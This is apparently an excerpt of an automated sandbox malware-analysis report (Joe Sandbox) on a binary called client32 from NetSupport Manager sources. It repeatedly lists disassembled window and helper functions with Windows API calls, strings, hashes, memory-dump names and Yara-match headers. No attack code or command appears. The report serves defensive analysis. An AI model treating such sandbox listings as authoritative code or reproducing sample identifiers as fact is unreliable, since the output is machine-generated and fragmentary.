                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                                                                    • Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
                                                                                                                                    • Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                                                                    • Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110173D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                    • String ID: QueueUserWorkItem
                                                                                                                                    • API String ID: 199729137-2469634949
                                                                                                                                    • Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                                                    • Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
                                                                                                                                    • Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                                                    • Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11014750 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(00000000,0000102E,00000000,?), ref: 11014793
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11014769
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11014764
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: edb666d734a3c39fef51d819953857bdb887e57867b1cab73224bd04a5144ee4
                                                                                                                                    • Instruction ID: c9fb50cd67a7904ce2a0fbbe4fb239e4265337958f9b9b5755b2e20bf6b4d1ba
                                                                                                                                    • Opcode Fuzzy Hash: edb666d734a3c39fef51d819953857bdb887e57867b1cab73224bd04a5144ee4
                                                                                                                                    • Instruction Fuzzy Hash: C8F0A075E0021DABCB14DF99CC85EDAF3E8EB0C310F00812AF819A7240E7B0A540CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11014640 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,00001003,?,00000000), ref: 1101467E
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11014656
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11014651
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: f583b1c5b20a86c22d2a28e61b92caf84120fa939f6efd175a3542e28d6d9ca0
                                                                                                                                    • Instruction ID: 66a3a55dc25f510b93f26b1a7f42dd2d5db843367b8ff42493b3ff2dd96a5ec2
                                                                                                                                    • Opcode Fuzzy Hash: f583b1c5b20a86c22d2a28e61b92caf84120fa939f6efd175a3542e28d6d9ca0
                                                                                                                                    • Instruction Fuzzy Hash: AAE09275B00219AFD350DA95DC81F96B3DCAB09719F014425F519DA154EBB0E94087A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11002130 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • IsWindow.USER32(?), ref: 1100213A
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_pToolbar, xrefs: 11002155
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h, xrefs: 11002150
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h$m_pToolbar
                                                                                                                                    • API String ID: 2577986331-281161189
                                                                                                                                    • Opcode ID: 35783d953fd85d00738a6eb2ba99d550ce6056d1f12e3eeb32741e389c5bd5cf
                                                                                                                                    • Instruction ID: 060336b2bd4469f278674b99be49374638fb6687acdde2fc2171db53485ff0b1
                                                                                                                                    • Opcode Fuzzy Hash: 35783d953fd85d00738a6eb2ba99d550ce6056d1f12e3eeb32741e389c5bd5cf
                                                                                                                                    • Instruction Fuzzy Hash: C6E09239F00511ABE715CA65E844F8AF3E9BF98744F000165E515D3621C730EC01CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11001090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 110010A6
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 2046328329-2830328467
                                                                                                                                    • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                                                                    • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                                                                                    • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                                                                    • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11001050 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11001066
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-2830328467
                                                                                                                                    • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                                                                    • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                                                                                    • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                                                                    • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110010E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • PostMessageA.USER32(?,?,?,?), ref: 11001113
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 110010F6
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 906220102-2830328467
                                                                                                                                    • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                                                                    • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                                                                                    • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                                                                    • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11014130 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,00001203,?,?), ref: 11014161
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11014143
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101413E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3507600817
                                                                                                                                    • Opcode ID: a4e8f6c1e0f0e719e49bb50dc02c9156cf18e10f3a85b9adc6d500caaea46bf6
                                                                                                                                    • Instruction ID: ce752b6915aa01a8741080b9e5a2c0ea08f5e284845c2bca3d31cce01905913c
                                                                                                                                    • Opcode Fuzzy Hash: a4e8f6c1e0f0e719e49bb50dc02c9156cf18e10f3a85b9adc6d500caaea46bf6
                                                                                                                                    • Instruction Fuzzy Hash: 60E08675A502187BD310DA81DC46FD6F39CEB55755F008126F9255A241D670B8408790
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110151A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
